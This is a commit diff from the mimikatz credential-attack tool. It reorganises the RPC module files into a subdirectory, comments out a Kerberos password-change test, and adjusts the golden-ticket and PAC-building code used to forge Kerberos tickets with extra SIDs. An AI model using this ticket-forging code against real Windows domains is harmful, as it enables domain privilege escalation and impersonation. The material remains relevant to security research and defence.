[internal] modules RPC directory & cleaning

This commit is contained in:
Benjamin DELPY 2016-07-19 17:48:55 +02:00
parent dc78942618
commit 4ed563f925
29 changed files with 6915 additions and 397 deletions

View File

@ -70,6 +70,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define RtlEqualGuid(L1, L2) (RtlEqualMemory(L1, L2, sizeof(GUID)))
#define SIZE_ALIGN(size, alignment) (size + ((size % alignment) ? (alignment - (size % alignment)) : 0))
#define LM_NTLM_HASH_LENGTH 16
#define KULL_M_WIN_BUILD_XP 2600

View File

@ -106,12 +106,13 @@
<ClCompile Include="..\modules\kull_m_process.c" />
<ClCompile Include="..\modules\kull_m_registry.c" />
<ClCompile Include="..\modules\kull_m_remotelib.c" />
<ClCompile Include="..\modules\kull_m_rpc.c" />
<ClCompile Include="..\modules\kull_m_rpc_bkrp.c" />
<ClCompile Include="..\modules\kull_m_rpc_drsr.c" />
<ClCompile Include="..\modules\kull_m_rpc_ms-bkrp_c.c" />
<ClCompile Include="..\modules\kull_m_rpc_ms-drsr_c.c" />
<ClCompile Include="..\modules\kull_m_rpc_ms-pac.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_bkrp.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_drsr.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-bkrp_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-drsr_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-pac.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_pac.c" />
<ClCompile Include="..\modules\kull_m_service.c" />
<ClCompile Include="..\modules\kull_m_string.c" />
<ClCompile Include="..\modules\kull_m_token.c" />
@ -187,14 +188,14 @@
<ClInclude Include="..\modules\kull_m_registry.h" />
<ClInclude Include="..\modules\kull_m_registry_structures.h" />
<ClInclude Include="..\modules\kull_m_remotelib.h" />
<ClInclude Include="..\modules\kull_m_rpc.h" />
<ClInclude Include="..\modules\kull_m_rpce.h" />
<ClInclude Include="..\modules\kull_m_rpc_bkrp.h" />
<ClInclude Include="..\modules\kull_m_rpc_drsr.h" />
<ClInclude Include="..\modules\kull_m_rpc_ms-drsr.h" />
<ClInclude Include="..\modules\kull_m_rpc_ms-dtyp.h" />
<ClInclude Include="..\modules\kull_m_rpc_ms-bkrp.h" />
<ClInclude Include="..\modules\kull_m_rpc_ms-pac.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_bkrp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_drsr.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-drsr.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-dtyp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-bkrp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-pac.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_pac.h" />
<ClInclude Include="..\modules\kull_m_samlib.h" />
<ClInclude Include="..\modules\kull_m_service.h" />
<ClInclude Include="..\modules\kull_m_string.h" />

View File

@ -170,12 +170,6 @@
<ClCompile Include="..\modules\kull_m_cred.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_ms-drsr_c.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_drsr.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_busylight.c">
<Filter>common modules</Filter>
</ClCompile>
@ -197,23 +191,32 @@
<ClCompile Include="..\modules\sqlite3_omit.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_ms-bkrp_c.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_bkrp.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_xml.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="modules\kuhl_m_iis.c">
<Filter>local modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_ms-pac.c">
<Filter>common modules</Filter>
<ClCompile Include="..\modules\rpc\kull_m_rpc.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_bkrp.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_drsr.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-bkrp_c.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-drsr_c.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-pac.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_pac.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
@ -356,9 +359,6 @@
<ClInclude Include="modules\kuhl_m_vault.h">
<Filter>local modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpce.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_samlib.h">
<Filter>common modules</Filter>
</ClInclude>
@ -404,15 +404,6 @@
<ClInclude Include="..\modules\kull_m_cred.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_ms-drsr.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_ms-dtyp.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_drsr.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_busylight.h">
<Filter>common modules</Filter>
</ClInclude>
@ -437,23 +428,35 @@
<ClInclude Include="..\modules\sqlite3_omit.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_ms-bkrp.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_bkrp.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_xml.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="modules\kuhl_m_iis.h">
<Filter>local modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_ms-pac.h">
<Filter>common modules</Filter>
<ClInclude Include="..\modules\rpc\kull_m_rpc.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_bkrp.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_drsr.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-bkrp.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-drsr.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-dtyp.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-pac.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_pac.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
@ -483,6 +486,9 @@
<Filter Include="local modules\dpapi\packages">
<UniqueIdentifier>{0068506b-99c4-4d30-936a-d54598f49425}</UniqueIdentifier>
</Filter>
<Filter Include="common modules\rpc">
<UniqueIdentifier>{36857c96-00a6-4cb6-8ca9-591d0561662c}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="mimikatz.rc" />

View File

@ -19,7 +19,6 @@ const KUHL_M_C kuhl_m_c_kerberos[] = {
{kuhl_m_kerberos_golden, L"golden", L"Willy Wonka factory"},
{kuhl_m_kerberos_hash, L"hash", L"Hash password to keys"},
#ifdef KERBEROS_TOOLS
{kuhl_m_kerberos_test, L"test", L"test"},
{kuhl_m_kerberos_decode, L"decrypt", L"Decrypt encoded ticket"},
{kuhl_m_kerberos_pac_info, L"pacinfo", L"Some infos on PAC file"},
#endif
@ -710,8 +709,14 @@ PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWST
validationInfo.SidCount = cbSids;
validationInfo.ExtraSids = sids;
if(cbSids && sids)
validationInfo.ResourceGroupDomainSid = NULL;
validationInfo.ResourceGroupCount = 0;
validationInfo.ResourceGroupIds = NULL;
if(validationInfo.ExtraSids && validationInfo.SidCount)
validationInfo.UserFlags |= 0x20;
if(validationInfo.ResourceGroupDomainSid && validationInfo.ResourceGroupIds && validationInfo.ResourceGroupCount)
validationInfo.UserFlags |= 0x200;
switch(keyType)
{
@ -903,103 +908,103 @@ NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[])
{
NTSTATUS status, packageStatus;
KERB_CHANGEPASSWORD_REQUEST kerbChangePasswordRequest;
PBYTE kerbChangePasswordRequestBuffer;
DWORD size, responseSize = 1024, offset = sizeof(KERB_CHANGEPASSWORD_REQUEST);
BYTE dumPtr[1024];
RtlZeroMemory(&kerbChangePasswordRequest, sizeof(KERB_CHANGEPASSWORD_REQUEST));
kerbChangePasswordRequest.MessageType = KerbChangePasswordMessage;
RtlInitUnicodeString(&kerbChangePasswordRequest.DomainName, L"chocolate.local");
RtlInitUnicodeString(&kerbChangePasswordRequest.AccountName, L"testme");
RtlInitUnicodeString(&kerbChangePasswordRequest.OldPassword, L"---");
RtlInitUnicodeString(&kerbChangePasswordRequest.NewPassword, L"t4waza1234/");
kerbChangePasswordRequest.Impersonating = FALSE;
size = kerbChangePasswordRequest.DomainName.Length + kerbChangePasswordRequest.AccountName.Length + kerbChangePasswordRequest.OldPassword.Length + kerbChangePasswordRequest.NewPassword.Length;
if(kerbChangePasswordRequestBuffer = (PBYTE) LocalAlloc(LPTR, offset + size))
{
RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.DomainName.Buffer, kerbChangePasswordRequest.DomainName.Length);
kerbChangePasswordRequest.DomainName.Buffer = (PWCHAR) offset;
offset += kerbChangePasswordRequest.DomainName.Length;
RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.AccountName.Buffer, kerbChangePasswordRequest.AccountName.Length);
kerbChangePasswordRequest.AccountName.Buffer = (PWCHAR) offset;
offset += kerbChangePasswordRequest.AccountName.Length;
RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.OldPassword.Buffer, kerbChangePasswordRequest.OldPassword.Length);
kerbChangePasswordRequest.OldPassword.Buffer = (PWCHAR) offset;
offset += kerbChangePasswordRequest.OldPassword.Length;
RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.NewPassword.Buffer, kerbChangePasswordRequest.NewPassword.Length);
kerbChangePasswordRequest.NewPassword.Buffer = (PWCHAR) offset;
offset += kerbChangePasswordRequest.NewPassword.Length;
RtlCopyMemory(kerbChangePasswordRequestBuffer, &kerbChangePasswordRequest, sizeof(KERB_CHANGEPASSWORD_REQUEST));
status = LsaCallKerberosPackage(kerbChangePasswordRequestBuffer, sizeof(KERB_CHANGEPASSWORD_REQUEST) + size, (PVOID *)&dumPtr, &responseSize, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
kprintf(L"KerbChangePasswordMessage is OK\n");
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbChangePasswordMessage / Package : %08x\n", packageStatus);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbChangePasswordMessage : %08x\n", status);
LocalFree(kerbChangePasswordRequestBuffer);
}
/*
KERB_SETPASSWORD_REQUEST kerbSetPasswordRequest;
PBYTE kerbSetPasswordRequestBuffer;
DWORD size, responseSize = 1024, offset = sizeof(KERB_SETPASSWORD_REQUEST);
BYTE dumPtr[1024];
RtlZeroMemory(&kerbSetPasswordRequest, sizeof(KERB_SETPASSWORD_REQUEST));
kerbSetPasswordRequest.MessageType = KerbSetPasswordMessage;
RtlInitUnicodeString(&kerbSetPasswordRequest.DomainName, L"chocolate.local");
RtlInitUnicodeString(&kerbSetPasswordRequest.AccountName, L"testme");
RtlInitUnicodeString(&kerbSetPasswordRequest.Password, L"t2waza1234/");
size = kerbSetPasswordRequest.DomainName.Length + kerbSetPasswordRequest.AccountName.Length + kerbSetPasswordRequest.Password.Length;
if(kerbSetPasswordRequestBuffer = (PBYTE) LocalAlloc(LPTR, offset + size))
{
RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.DomainName.Buffer, kerbSetPasswordRequest.DomainName.Length);
kerbSetPasswordRequest.DomainName.Buffer = (PWCHAR) offset;
offset += kerbSetPasswordRequest.DomainName.Length;
RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.AccountName.Buffer, kerbSetPasswordRequest.AccountName.Length);
kerbSetPasswordRequest.AccountName.Buffer = (PWCHAR) offset;
offset += kerbSetPasswordRequest.AccountName.Length;
RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.Password.Buffer, kerbSetPasswordRequest.Password.Length);
kerbSetPasswordRequest.Password.Buffer = (PWCHAR) offset;
offset += kerbSetPasswordRequest.Password.Length;
RtlCopyMemory(kerbSetPasswordRequestBuffer, &kerbSetPasswordRequest, sizeof(KERB_SETPASSWORD_REQUEST));
status = LsaCallKerberosPackage(kerbSetPasswordRequestBuffer, sizeof(KERB_SETPASSWORD_REQUEST) + size, (PVOID *)&dumPtr, &responseSize, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
kprintf(L"kerbSetPasswordRequest is OK\n");
else PRINT_ERROR(L"LsaCallAuthenticationPackage kerbSetPasswordRequest / Package : %08x\n", packageStatus);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage kerbSetPasswordRequest : %08x\n", status);
LocalFree(kerbSetPasswordRequestBuffer);
}
*/
return STATUS_SUCCESS;
}
//NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[])
//{
// NTSTATUS status, packageStatus;
//
// KERB_CHANGEPASSWORD_REQUEST kerbChangePasswordRequest;
// PBYTE kerbChangePasswordRequestBuffer;
//
// DWORD size, responseSize = 1024, offset = sizeof(KERB_CHANGEPASSWORD_REQUEST);
// BYTE dumPtr[1024];
//
// RtlZeroMemory(&kerbChangePasswordRequest, sizeof(KERB_CHANGEPASSWORD_REQUEST));
//
// kerbChangePasswordRequest.MessageType = KerbChangePasswordMessage;
// RtlInitUnicodeString(&kerbChangePasswordRequest.DomainName, L"chocolate.local");
// RtlInitUnicodeString(&kerbChangePasswordRequest.AccountName, L"testme");
// RtlInitUnicodeString(&kerbChangePasswordRequest.OldPassword, L"---");
// RtlInitUnicodeString(&kerbChangePasswordRequest.NewPassword, L"t4waza1234/");
// kerbChangePasswordRequest.Impersonating = FALSE;
//
// size = kerbChangePasswordRequest.DomainName.Length + kerbChangePasswordRequest.AccountName.Length + kerbChangePasswordRequest.OldPassword.Length + kerbChangePasswordRequest.NewPassword.Length;
// if(kerbChangePasswordRequestBuffer = (PBYTE) LocalAlloc(LPTR, offset + size))
// {
// RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.DomainName.Buffer, kerbChangePasswordRequest.DomainName.Length);
// kerbChangePasswordRequest.DomainName.Buffer = (PWCHAR) offset;
// offset += kerbChangePasswordRequest.DomainName.Length;
//
// RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.AccountName.Buffer, kerbChangePasswordRequest.AccountName.Length);
// kerbChangePasswordRequest.AccountName.Buffer = (PWCHAR) offset;
// offset += kerbChangePasswordRequest.AccountName.Length;
//
// RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.OldPassword.Buffer, kerbChangePasswordRequest.OldPassword.Length);
// kerbChangePasswordRequest.OldPassword.Buffer = (PWCHAR) offset;
// offset += kerbChangePasswordRequest.OldPassword.Length;
//
// RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.NewPassword.Buffer, kerbChangePasswordRequest.NewPassword.Length);
// kerbChangePasswordRequest.NewPassword.Buffer = (PWCHAR) offset;
// offset += kerbChangePasswordRequest.NewPassword.Length;
//
//
// RtlCopyMemory(kerbChangePasswordRequestBuffer, &kerbChangePasswordRequest, sizeof(KERB_CHANGEPASSWORD_REQUEST));
//
// status = LsaCallKerberosPackage(kerbChangePasswordRequestBuffer, sizeof(KERB_CHANGEPASSWORD_REQUEST) + size, (PVOID *)&dumPtr, &responseSize, &packageStatus);
// if(NT_SUCCESS(status))
// {
// if(NT_SUCCESS(packageStatus))
// kprintf(L"KerbChangePasswordMessage is OK\n");
// else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbChangePasswordMessage / Package : %08x\n", packageStatus);
// }
// else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbChangePasswordMessage : %08x\n", status);
//
// LocalFree(kerbChangePasswordRequestBuffer);
// }
//
///*
// KERB_SETPASSWORD_REQUEST kerbSetPasswordRequest;
// PBYTE kerbSetPasswordRequestBuffer;
//
// DWORD size, responseSize = 1024, offset = sizeof(KERB_SETPASSWORD_REQUEST);
// BYTE dumPtr[1024];
//
// RtlZeroMemory(&kerbSetPasswordRequest, sizeof(KERB_SETPASSWORD_REQUEST));
// kerbSetPasswordRequest.MessageType = KerbSetPasswordMessage;
// RtlInitUnicodeString(&kerbSetPasswordRequest.DomainName, L"chocolate.local");
// RtlInitUnicodeString(&kerbSetPasswordRequest.AccountName, L"testme");
// RtlInitUnicodeString(&kerbSetPasswordRequest.Password, L"t2waza1234/");
//
//
// size = kerbSetPasswordRequest.DomainName.Length + kerbSetPasswordRequest.AccountName.Length + kerbSetPasswordRequest.Password.Length;
// if(kerbSetPasswordRequestBuffer = (PBYTE) LocalAlloc(LPTR, offset + size))
// {
// RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.DomainName.Buffer, kerbSetPasswordRequest.DomainName.Length);
// kerbSetPasswordRequest.DomainName.Buffer = (PWCHAR) offset;
// offset += kerbSetPasswordRequest.DomainName.Length;
//
// RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.AccountName.Buffer, kerbSetPasswordRequest.AccountName.Length);
// kerbSetPasswordRequest.AccountName.Buffer = (PWCHAR) offset;
// offset += kerbSetPasswordRequest.AccountName.Length;
//
// RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.Password.Buffer, kerbSetPasswordRequest.Password.Length);
// kerbSetPasswordRequest.Password.Buffer = (PWCHAR) offset;
// offset += kerbSetPasswordRequest.Password.Length;
//
// RtlCopyMemory(kerbSetPasswordRequestBuffer, &kerbSetPasswordRequest, sizeof(KERB_SETPASSWORD_REQUEST));
//
// status = LsaCallKerberosPackage(kerbSetPasswordRequestBuffer, sizeof(KERB_SETPASSWORD_REQUEST) + size, (PVOID *)&dumPtr, &responseSize, &packageStatus);
// if(NT_SUCCESS(status))
// {
// if(NT_SUCCESS(packageStatus))
// kprintf(L"kerbSetPasswordRequest is OK\n");
// else PRINT_ERROR(L"LsaCallAuthenticationPackage kerbSetPasswordRequest / Package : %08x\n", packageStatus);
// }
// else PRINT_ERROR(L"LsaCallAuthenticationPackage kerbSetPasswordRequest : %08x\n", status);
//
// LocalFree(kerbSetPasswordRequestBuffer);
// }
// */
//
// return STATUS_SUCCESS;
//}
#endif

View File

@ -43,7 +43,6 @@ NTSTATUS kuhl_m_kerberos_tgt(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_purge(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_hash(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_hash_data(LONG keyType, PCUNICODE_STRING pString, PCUNICODE_STRING pSalt, DWORD count);
wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext);

View File

@ -9,34 +9,20 @@ BOOL kuhl_m_pac_validationInfo_to_PAC(PKERB_VALIDATION_INFO validationInfo, DWOR
{
BOOL status = FALSE;
PVOID pLogonInfo = NULL;
DWORD szLogonInfo = 0, szLogonInfoAligned = 0;
PPAC_CLIENT_INFO pClientInfo = NULL;
DWORD szClientInfo = 0, szClientInfoAligned = 0;
PAC_SIGNATURE_DATA signature = {SignatureType, {0}};//, {0}, 0, 0};
DWORD szSignature = FIELD_OFFSET(PAC_SIGNATURE_DATA, Signature), szSignatureAligned;//sizeof(PAC_SIGNATURE_DATA) - 2 * sizeof(USHORT), szSignatureAligned;
DWORD modulo, offsetData = sizeof(PACTYPE) + 3 * sizeof(PAC_INFO_BUFFER);
PAC_SIGNATURE_DATA signature = {SignatureType, {0}};
DWORD szLogonInfo = 0, szLogonInfoAligned, szClientInfo = 0, szClientInfoAligned, szSignature = FIELD_OFFSET(PAC_SIGNATURE_DATA, Signature), szSignatureAligned, offsetData = sizeof(PACTYPE) + 3 * sizeof(PAC_INFO_BUFFER);
PKERB_CHECKSUM pCheckSum;
if(NT_SUCCESS(CDLocateCheckSum(SignatureType, &pCheckSum)))
{
if(kuhl_m_pac_validationInfo_to_LOGON_INFO(validationInfo, &pLogonInfo, &szLogonInfo))
{
szLogonInfoAligned = szLogonInfo;
if(modulo = szLogonInfo % 8)
szLogonInfoAligned += 8 - modulo;
}
if(kuhl_m_pac_validationInfo_to_CNAME_TINFO(validationInfo, &pClientInfo, &szClientInfo))
{
szClientInfoAligned = szClientInfo;
if(modulo = szClientInfo % 8)
szClientInfoAligned += (8 - modulo);
}
szSignature += pCheckSum->Size;
szSignatureAligned = SIZE_ALIGN(szSignature, 8);
szSignatureAligned = szSignature;
if(modulo = szSignature % 8)
szSignatureAligned += 8 - modulo;
if(kuhl_m_pac_EncodeValidationInformation(validationInfo, &pLogonInfo, &szLogonInfo))
szLogonInfoAligned = SIZE_ALIGN(szLogonInfo, 8);
if(kuhl_m_pac_validationInfo_to_CNAME_TINFO(validationInfo, &pClientInfo, &szClientInfo))
szClientInfoAligned = SIZE_ALIGN(szClientInfo, 8);
if(pLogonInfo && pClientInfo)
{
@ -80,7 +66,7 @@ BOOL kuhl_m_pac_validationInfo_to_PAC(PKERB_VALIDATION_INFO validationInfo, DWOR
NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, DWORD SignatureType, LPCVOID key, DWORD keySize)
{
NTSTATUS status = STATUS_NOT_FOUND;
NTSTATUS status;
DWORD i;
PKERB_CHECKSUM pCheckSum;
PVOID Context;
@ -90,6 +76,7 @@ NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, DWORD Signature
status = CDLocateCheckSum(SignatureType, &pCheckSum);
if(NT_SUCCESS(status))
{
status = STATUS_NOT_FOUND;
for(i = 0; i < pacType->cBuffers; i++)
{
if((pacType->Buffers[i].ulType == PACINFO_TYPE_CHECKSUM_SRV) || (pacType->Buffers[i].ulType == PACINFO_TYPE_CHECKSUM_KDC))
@ -123,38 +110,6 @@ NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, DWORD Signature
return status;
}
BOOL kuhl_m_pac_validationInfo_to_LOGON_INFO(PKERB_VALIDATION_INFO validationInfo, PVOID *rpceValidationInfo, DWORD *rpceValidationInfoLength)
{
BOOL status = FALSE;
RPC_STATUS rpcStatus;
KULL_M_RPC_FCNSTRUCT UserState;
handle_t pHandle;
rpcStatus = MesEncodeIncrementalHandleCreate(&UserState, ReadFcn, WriteFcn, &pHandle);
if(NT_SUCCESS(rpcStatus))
{
*rpceValidationInfoLength = (DWORD) PKERB_VALIDATION_INFO_AlignSize(pHandle, &validationInfo);
if(*rpceValidationInfo = LocalAlloc(LPTR, *rpceValidationInfoLength))
{
rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_ENCODE);
if(NT_SUCCESS(rpcStatus))
{
UserState.addr = *rpceValidationInfo;
UserState.size = *rpceValidationInfoLength;
PKERB_VALIDATION_INFO_Encode(pHandle, &validationInfo);
status = TRUE;
}
else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
if(!status)
*rpceValidationInfo = LocalFree(*rpceValidationInfo);
}
MesHandleFree(pHandle);
}
else PRINT_ERROR(L"MesEncodeIncrementalHandleCreate: %08x\n", rpcStatus);
return status;
}
BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PKERB_VALIDATION_INFO validationInfo, PPAC_CLIENT_INFO * pacClientInfo, DWORD * pacClientInfoLength)
{
BOOL status = FALSE;
@ -170,90 +125,15 @@ BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PKERB_VALIDATION_INFO validationIn
}
#ifdef KERBEROS_TOOLS
const RPCE_LAZY_ELEMENT_HEADER kuhl_m_kerberos_pac_headers[] = {
//{0x00020000, sizeof(KERB_VALIDATION_INFO), 0, FALSE},
{PACINFO_ID_KERB_EFFECTIVENAME, sizeof(WCHAR), 0, TRUE}, // EffectiveName
{PACINFO_ID_KERB_FULLNAME, sizeof(WCHAR), 0, TRUE}, // FullName
{PACINFO_ID_KERB_LOGONSCRIPT, sizeof(WCHAR), 0, TRUE}, // LogonScript
{PACINFO_ID_KERB_PROFILEPATH, sizeof(WCHAR), 0, TRUE}, // ProfilePath
{PACINFO_ID_KERB_HOMEDIRECTORY, sizeof(WCHAR), 0, TRUE}, // HomeDirectory
{PACINFO_ID_KERB_HOMEDIRECTORYDRIVE, sizeof(WCHAR), 0, TRUE}, // HomeDirectoryDrive
{PACINFO_ID_KERB_GROUPIDS, sizeof(GROUP_MEMBERSHIP), 0, FALSE}, // GroupIds
{PACINFO_ID_KERB_LOGONSERVER, sizeof(WCHAR), 0, TRUE}, // LogonServer
{PACINFO_ID_KERB_LOGONDOMAINNAME, sizeof(WCHAR), 0, TRUE}, // LogonDomainName
{PACINFO_ID_KERB_LOGONDOMAINID, sizeof(DWORD), 8, FALSE}, // LogonDomainId
{PACINFO_ID_KERB_EXTRASIDS, sizeof(DWORD)+sizeof(RPCEID), 0, FALSE},
{PACINFO_ID_KERB_EXTRASID, sizeof(DWORD), 8, FALSE},
{PACINFO_ID_KERB_RESGROUPDOMAINSID, sizeof(DWORD), 8, FALSE},
{PACINFO_ID_KERB_RESGROUPIDS, sizeof(GROUP_MEMBERSHIP), 0, FALSE},
// ... Lazy ;)
};
PVOID kuhl_m_kerberos_pac_giveElementById(RPCEID id, LPCVOID base)
{
DWORD i, modulo;
PBYTE start = (PBYTE) base;
ULONG64 dataOffset, nextOffset;
if(id)
{
for(i = 0; i < ARRAYSIZE(kuhl_m_kerberos_pac_headers); i++)
{
if(kuhl_m_kerberos_pac_headers[i].isBuffer)
{
dataOffset = sizeof(ULONG64) + sizeof(ULONG32);
nextOffset = *((PULONG32) (start + sizeof(ULONG64))) * kuhl_m_kerberos_pac_headers[i].ElementSize;
/*/kprintf(L"Buffer\t%016llx %08x -- ", *(PULONG64) start, *(PULONG32) (start + 8));
kull_m_string_wprintf_hex(start + dataOffset, (DWORD) nextOffset, 1);
kprintf(L"\n");*/
}
else
{
dataOffset = sizeof(ULONG32);
nextOffset = *((PULONG32) start) * kuhl_m_kerberos_pac_headers[i].ElementSize;
/*kprintf(L"%u, %u\n", *((PULONG32) start), *((PULONG32) start) * kuhl_m_kerberos_pac_headers[i].ElementSize);
kprintf(L"Data\t %08x -- ", *(PULONG64) start, *(PULONG32) (start + 4));
kull_m_string_wprintf_hex(start + dataOffset, (DWORD) nextOffset + kuhl_m_kerberos_pac_headers[i].FixedBeginSize, 1);
kprintf(L"\n");*/
}
if(id == kuhl_m_kerberos_pac_headers[i].ElementId)
{
//kull_m_string_wprintf_hex(start, 12, 1); kprintf(L"\n");
if(nextOffset)
return start + dataOffset;
else
return NULL;
}
start += dataOffset + nextOffset + kuhl_m_kerberos_pac_headers[i].FixedBeginSize;
if(modulo = ((ULONG_PTR) start % 4))
start += 4 - modulo;
}
}
return NULL;
}
void kuhl_m_kerberos_pac_ustring(LPCWCHAR prefix, PMARSHALL_UNICODE_STRING pString, PVOID base)
{
UNICODE_STRING s = {pString->Length, pString->MaximumLength, (PWSTR) kuhl_m_kerberos_pac_giveElementById(pString->ElementId, base)};
kprintf(L"%s (%2hu, %2hu, @ %08x) - %wZ\n", prefix, pString->Length, pString->MaximumLength, pString->ElementId, &s);
}
NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[])
{
PPACTYPE pacType;
DWORD pacLenght, i, j;
BYTE buffer[16] = {0};
PRPCE_KERB_VALIDATION_INFO pValInfo;
PKERB_VALIDATION_INFO pValInfo;
